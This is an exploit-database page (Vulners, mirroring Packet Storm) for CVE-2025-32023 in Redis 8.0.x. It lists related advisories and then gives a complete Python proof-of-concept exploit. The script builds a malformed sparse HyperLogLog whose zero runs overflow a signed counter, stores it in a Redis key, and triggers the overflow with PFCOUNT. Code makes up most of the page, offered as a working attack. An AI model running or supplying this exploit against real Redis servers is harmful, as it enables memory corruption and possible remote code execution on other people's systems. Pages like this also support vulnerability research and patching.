Vulners
Lucene search
📄 Redis 8.0.2 Remote Code Execution
🗓️ 05 Feb 2026 00:00:00Reported by Beatriz Fresno NaumovaType 
packetstorm🔗 packetstorm.news👁 179 Views
| Reporter | Title | Published | Views | Family All 230 |
|---|---|---|---|---|
 | Security Bulletin: Due to the use of Redis, IBM DataPower Gateway is vulnerable to a denial of service | 23 Oct 202520:56 | – | ibm |
 | Exploit for CVE-2025-32023 | 6 Jul 202518:09 | – | githubexploit |
| Exploit for CVE-2025-32023 | 9 Jul 202521:34 | – | githubexploit |
 | Amazon Linux 2023 : redis6, redis6-devel (ALAS2023-2025-1066) | 10 Jul 202500:00 | – | nessus |
| Amazon Linux 2023 : valkey, valkey-devel (ALAS2023-2025-1067) | 10 Jul 202500:00 | – | nessus |
| Amazon Linux 2 : redis (ALASREDIS6-2025-013) | 10 Jul 202500:00 | – | nessus |
| Alibaba Cloud Linux 3 : 0125: redis:6 (ALINUX3-SA-2025:0125) | 6 Aug 202500:00 | – | nessus |
| AlmaLinux 10 : valkey (ALSA-2025:11401) | 9 Oct 202500:00 | – | nessus |
| AlmaLinux 8 : redis:6 (ALSA-2025:12006) | 30 Jul 202500:00 | – | nessus |
| AlmaLinux 9 : redis:7 (ALSA-2025:12008) | 30 Jul 202500:00 | – | nessus |
10
# Exploit Title: Redis RCE
# Date: 2025-10-07
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/
# Version: Affects :>= 8.0.0, < 8.0.3
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-32023
import redis
import sys
# --- Configuration ---
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_KEY = 'hll:exp'
# HLL encoding type (1 = sparse)
HLL_SPARSE = 1
def p8(value):
"""Convert integer to single byte."""
return bytes([value])
def xzero(size):
"""
Construct an 'xzero' run for sparse HLL:
Creates a run-length encoding entry of zeroes with a specific size.
"""
if not (1 <= size <= 0x4000):
raise ValueError("Invalid xzero size: must be between 1 and 0x4000")
size -= 1
return p8(0b01_000000 | (size >> 8)) + p8(size & 0xff)
def build_malformed_hll():
"""
Construct a malformed HLL payload that overflows internal counters.
"""
payload = b'HYLL' # Magic header
payload += p8(HLL_SPARSE) # Encoding type: sparse
payload += p8(0) * 3 # Reserved
payload += p8(0) * 8 # Unused (padding)
assert len(payload) == 0x10 # Check header size
# Append enough xzero runs to cause overflow
payload += xzero(0x4000) * 0x20000 # == -0x80000000 when cast to signed int
# Add one more run to complete the structure
payload += p8(0b11111111) # Runlen=4, regval=0x20 (but malformed)
return payload
def main():
try:
print(f"[*] Connecting to Redis at {REDIS_HOST}:{REDIS_PORT}...")
r = redis.Redis(REDIS_HOST, REDIS_PORT)
print("[*] Building malformed HyperLogLog payload...")
hll_payload = build_malformed_hll()
print(f"[*] Writing malformed HLL to key: {REDIS_KEY}")
r.set(REDIS_KEY, hll_payload)
print("[*] Triggering HLL merge operation (pfcount)...")
r.pfcount(REDIS_KEY, REDIS_KEY)
print("[+] Exploit triggered successfully.")
except Exception as e:
print(f"[!] Exploit failed: {e}")
sys.exit(1)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2026 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.17 - 7.8
EPSS0.18438
SSVC